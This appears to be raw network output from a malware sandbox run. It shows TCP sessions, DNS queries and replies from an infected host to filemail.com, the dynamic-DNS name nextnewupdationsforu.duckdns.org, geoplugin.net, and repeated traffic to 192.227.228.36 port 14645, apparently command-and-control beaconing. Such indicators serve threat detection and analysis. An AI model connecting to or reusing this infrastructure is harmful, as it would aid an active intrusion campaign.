                                                                                                                                                                                                                                Nov 18, 2024 16:53:43.095168114 CET55677443192.168.2.8172.217.16.193
Nov 18, 2024 16:53:43.095180988 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.138504028 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.138521910 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.152218103 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.152287006 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.152307987 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.191375017 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.191454887 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.191462994 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.191473961 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.191591024 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.194750071 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.201421022 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.201457024 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.201535940 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.201546907 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.201674938 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.205087900 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.212147951 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.212253094 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.212263107 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.269004107 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.269105911 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.269117117 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.304886103 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.305078030 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.305099964 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.308795929 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.308872938 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.308881044 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.319072962 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.319156885 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.319169044 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.322253942 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.322406054 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.322413921 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.329261065 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.329385996 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.329406977 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.422018051 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.422051907 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.422101021 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.422122002 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.422173977 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.426043987 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.435709953 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.435764074 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.435786963 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.435808897 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.435832024 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.435832977 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.435844898 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.435946941 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.436542034 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.445338011 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.445399046 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.445410967 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.447505951 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.447848082 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.447864056 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.529793024 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.536297083 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.541557074 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.541611910 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.541637897 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.544409037 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.544508934 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.544517994 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.552874088 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.552977085 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.552985907 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.562489033 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.562519073 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.562558889 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.562570095 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.562622070 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.562772036 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.566865921 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.566958904 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.566965103 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.639153004 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.658941984 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.659080982 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.659138918 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.659147024 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.660593033 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.660626888 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.660648108 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.660723925 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.660723925 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.660732031 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.669917107 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.670224905 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.670234919 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.672012091 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:43.672074080 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.954835892 CET  55677  443    192.168.2.8     172.217.16.193
Nov 18, 2024 16:53:43.954865932 CET  443    55677  172.217.16.193  192.168.2.8
Nov 18, 2024 16:53:44.764638901 CET  55693  443    192.168.2.8     18.244.18.27
Nov 18, 2024 16:53:44.764672995 CET  443    55693  18.244.18.27    192.168.2.8
Nov 18, 2024 16:53:44.764722109 CET  55693  443    192.168.2.8     18.244.18.27
Nov 18, 2024 16:53:44.765088081 CET  55693  443    192.168.2.8     18.244.18.27
Nov 18, 2024 16:53:44.765101910 CET  443    55693  18.244.18.27    192.168.2.8
Nov 18, 2024 16:53:45.655049086 CET  443    55693  18.244.18.27    192.168.2.8
Nov 18, 2024 16:53:45.655272007 CET  55693  443    192.168.2.8     18.244.18.27
Nov 18, 2024 16:53:45.655297041 CET  443    55693  18.244.18.27    192.168.2.8
Nov 18, 2024 16:53:45.656389952 CET  443    55693  18.244.18.27    192.168.2.8
Nov 18, 2024 16:53:45.656438112 CET  55693  443    192.168.2.8     18.244.18.27
Nov 18, 2024 16:53:46.512372971 CET  55652  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:46.517498016 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:46.517556906 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:46.517585039 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:46.517591000 CET  55652  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:46.517612934 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:46.517630100 CET  55652  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:46.517630100 CET  55652  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:46.517642021 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:46.517690897 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:46.517695904 CET  55652  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:46.517718077 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:46.517738104 CET  55652  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:46.517745972 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:46.517755985 CET  55652  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:46.517772913 CET  14645  55652  192.227.228.36  192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.517786026 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.517802954 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.517849922 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.522856951 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.522888899 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.522943020 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.522952080 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.522970915 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.522984982 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.523000956 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.523029089 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.523073912 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.523073912 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.523078918 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.523108006 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.523135900 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.523153067 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.523169041 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.523199081 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.523217916 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.523240089 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.525227070 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528157949 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528228045 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528283119 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528316021 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528359890 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528390884 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528400898 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528600931 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528633118 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528768063 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528798103 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528825045 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528856039 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528883934 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528932095 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528958082 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.528985023 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.529036045 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.529087067 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.529114008 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.529144049 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.529232025 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.529258966 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.529301882 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.529334068 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.529361010 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.530344963 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.530376911 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.530404091 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.530467987 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.533276081 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.533308029 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.533355951 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.533386946 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.533500910 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.533528090 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.533627033 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.533654928 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.533687115 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.533730030 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.534326077 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:46.534390926 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:51.738832951 CET55693443192.168.2.818.244.18.27
                                                                                                                                                                                                                                Nov 18, 2024 16:53:51.738899946 CET4435569318.244.18.27192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:51.738974094 CET55693443192.168.2.818.244.18.27
                                                                                                                                                                                                                                Nov 18, 2024 16:54:08.895694971 CET1464555649192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:54:08.896980047 CET5564914645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:54:08.901932001 CET1464555649192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:54:23.353506088 CET5565180192.168.2.8178.237.33.50
                                                                                                                                                                                                                                Nov 18, 2024 16:54:23.359092951 CET8055651178.237.33.50192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:54:39.322411060 CET1464555649192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:54:39.324409008 CET5564914645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:54:39.329303026 CET1464555649192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:55:09.790617943 CET1464555649192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:55:09.792211056 CET5564914645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:55:09.797230005 CET1464555649192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:55:39.913151979 CET1464555649192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:55:39.915179014 CET5564914645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:55:39.920193911 CET1464555649192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:56:10.473118067 CET1464555649192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:56:10.475270033 CET5564914645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:56:10.480870962 CET1464555649192.227.228.36192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                Nov 18, 2024 16:53:16.022196054 CET5743553192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:17.022600889 CET5743553192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:19.040205002 CET5743553192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:19.290700912 CET53574351.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:19.290724039 CET53574351.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:19.290738106 CET53574351.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:19.294964075 CET53574351.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:20.308290958 CET5160753192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:20.913058043 CET53516071.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:22.962208986 CET6398353192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:22.971534967 CET53639831.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:37.406054974 CET6356253192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:38.772593975 CET6115153192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:41.531089067 CET5765153192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:41.538750887 CET53576511.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.740674019 CET4929753192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.748003960 CET5656153192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.748486996 CET53492971.1.1.1192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.751754999 CET5806253192.168.2.81.1.1.1
                                                                                                                                                                                                                                Nov 18, 2024 16:53:44.759027004 CET6049653192.168.2.81.1.1.1
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 18, 2024 16:52:31.055679083 CET | 192.168.2.8 | 1.1.1.1 | 0x76ab | Standard query (0) | 1017.filemail.com | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:52:50.219079018 CET | 192.168.2.8 | 1.1.1.1 | 0xa470 | Standard query (0) | 15.164.165.52.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Nov 18, 2024 16:52:59.650696039 CET | 192.168.2.8 | 1.1.1.1 | 0xae18 | Standard query (0) | nextnewupdationsforu.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:00.662868977 CET | 192.168.2.8 | 1.1.1.1 | 0xae18 | Standard query (0) | nextnewupdationsforu.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:01.664617062 CET | 192.168.2.8 | 1.1.1.1 | 0xae18 | Standard query (0) | nextnewupdationsforu.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:03.678389072 CET | 192.168.2.8 | 1.1.1.1 | 0xae18 | Standard query (0) | nextnewupdationsforu.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:04.975879908 CET | 192.168.2.8 | 1.1.1.1 | 0xb978 | Standard query (0) | nextnewupdationsforu.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:05.978439093 CET | 192.168.2.8 | 1.1.1.1 | 0xb978 | Standard query (0) | nextnewupdationsforu.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:06.985733986 CET | 192.168.2.8 | 1.1.1.1 | 0xb978 | Standard query (0) | nextnewupdationsforu.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:10.007330894 CET | 192.168.2.8 | 1.1.1.1 | 0x1398 | Standard query (0) | nextnewupdationsforu.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:11.006668091 CET | 192.168.2.8 | 1.1.1.1 | 0x1398 | Standard query (0) | nextnewupdationsforu.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:12.011056900 CET | 192.168.2.8 | 1.1.1.1 | 0x1398 | Standard query (0) | nextnewupdationsforu.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:15.022682905 CET | 192.168.2.8 | 1.1.1.1 | 0x6f7a | Standard query (0) | nextnewupdationsforu.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:16.022196054 CET | 192.168.2.8 | 1.1.1.1 | 0x6f7a | Standard query (0) | nextnewupdationsforu.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:17.022600889 CET | 192.168.2.8 | 1.1.1.1 | 0x6f7a | Standard query (0) | nextnewupdationsforu.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:19.040205002 CET | 192.168.2.8 | 1.1.1.1 | 0x6f7a | Standard query (0) | nextnewupdationsforu.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:20.308290958 CET | 192.168.2.8 | 1.1.1.1 | 0x3204 | Standard query (0) | nextnewupdationsforu.duckdns.org | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:22.962208986 CET | 192.168.2.8 | 1.1.1.1 | 0xe12c | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:37.406054974 CET | 192.168.2.8 | 1.1.1.1 | 0x4803 | Standard query (0) | ntp.msn.com | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:38.772593975 CET | 192.168.2.8 | 1.1.1.1 | 0xb2fc | Standard query (0) | bzib.nelreports.net | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:41.531089067 CET | 192.168.2.8 | 1.1.1.1 | 0x5808 | Standard query (0) | clients2.googleusercontent.com | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:44.740674019 CET | 192.168.2.8 | 1.1.1.1 | 0x67c2 | Standard query (0) | sb.scorecardresearch.com | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:44.748003960 CET | 192.168.2.8 | 1.1.1.1 | 0x45a0 | Standard query (0) | assets.msn.com | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:44.751754999 CET | 192.168.2.8 | 1.1.1.1 | 0x5979 | Standard query (0) | c.msn.com | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:44.759027004 CET | 192.168.2.8 | 1.1.1.1 | 0x1b91 | Standard query (0) | api.msn.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 18, 2024 16:52:31.073869944 CET | 1.1.1.1 | 192.168.2.8 | 0x76ab | No error (0) | 1017.filemail.com | ip.1017.filemail.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 16:52:31.073869944 CET | 1.1.1.1 | 192.168.2.8 | 0x76ab | No error (0) | ip.1017.filemail.com | | 142.215.209.78 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:52:50.227216005 CET | 1.1.1.1 | 192.168.2.8 | 0xa470 | Name error (3) | 15.164.165.52.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Nov 18, 2024 16:53:03.968883038 CET | 1.1.1.1 | 192.168.2.8 | 0xae18 | Server failure (2) | nextnewupdationsforu.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:03.968925953 CET | 1.1.1.1 | 192.168.2.8 | 0xae18 | Server failure (2) | nextnewupdationsforu.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:03.968955994 CET | 1.1.1.1 | 192.168.2.8 | 0xae18 | Server failure (2) | nextnewupdationsforu.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:03.968991041 CET | 1.1.1.1 | 192.168.2.8 | 0xae18 | Server failure (2) | nextnewupdationsforu.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:08.986231089 CET | 1.1.1.1 | 192.168.2.8 | 0xb978 | Server failure (2) | nextnewupdationsforu.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:08.986274004 CET | 1.1.1.1 | 192.168.2.8 | 0xb978 | Server failure (2) | nextnewupdationsforu.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:08.986303091 CET | 1.1.1.1 | 192.168.2.8 | 0xb978 | Server failure (2) | nextnewupdationsforu.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:14.016832113 CET | 1.1.1.1 | 192.168.2.8 | 0x1398 | Server failure (2) | nextnewupdationsforu.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:14.016879082 CET | 1.1.1.1 | 192.168.2.8 | 0x1398 | Server failure (2) | nextnewupdationsforu.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:14.016916990 CET | 1.1.1.1 | 192.168.2.8 | 0x1398 | Server failure (2) | nextnewupdationsforu.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Nov 18, 2024 16:53:19.290700912 CET | 1.1.1.1 | 192.168.2.8 | 0x6f7a | Server failure (2) | nextnewupdationsforu.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
